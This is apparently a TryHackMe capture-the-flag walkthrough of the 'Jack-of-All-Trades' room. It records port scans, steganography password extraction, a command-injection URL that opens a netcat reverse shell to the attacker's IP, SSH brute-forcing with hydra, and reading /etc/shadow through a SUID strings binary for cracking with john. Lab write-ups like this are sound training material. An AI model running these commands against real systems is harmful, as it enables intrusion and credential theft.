Jack-of-All-Trades
Room Link: https://tryhackme.com/room/jackofalltrades
Initial Scan
For some reason they switched port 22 with http site and 80 with ssh
Kali
nmap -A $VICTIM

Scan all ports
No other ports found
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/22 - HTTP
gobuster dir -u http://$VICTIM:22 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt


Had to all the override to see the site on port 22 in firefox




There is a stegosaurus picture on the home page so it is hinting that there's something in one of the pictures, eventually we find jackinthebox username and password in one of the pictures.
Kali
steghide extract -sf stego.jpg
Password: u?WtKSraq
steghide extract -sf header.jpg
Password: u?WtKSraq




If you run a command like this you can't see the results unless you view the source.
Browser
view-source:http://$VICTIM:22/nnxhweOV/index.php?cmd=whoami

Kali
nc -lvnp 1337
Browser
view-source:http://$VICTIM:22/nnxhweOV/index.php?cmd=nc%20-c%20sh%2010.10.154.80%201337

Get autocomplete
python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
In the home directory there is a password list, it's small enough so I copied and pasted into a file on Kali.

Kali
hydra -s 80 -l jack -P passwords.txt $VICTIM -t4 ssh

Kali
ssh jack@$VICTIM -p 80
Password: ITMJpGGIqg1jn?>@


PSPY
Kali
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy32
python2 -m SimpleHTTPServer 81
Victim
cd /tmp
wget http://$KALI:81/pspy32
chmod +x pspy32
./pspy32
Strings as the SUID-bit set which means we can run it against files we normally wouldn't be able to read. I tried getting roots password but it was taking too long.
Victim
find / -perm -u=s -type f 2> /dev/null
/usr/bin/strings /etc/shadow
/usr/bin/strings /etc/passwd
Kali
unshadow passwd shadow > passwords.txt
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
I just ended up using strings to read the root.txt
Kali
/usr/bin/strings /root/root.txt

Last updated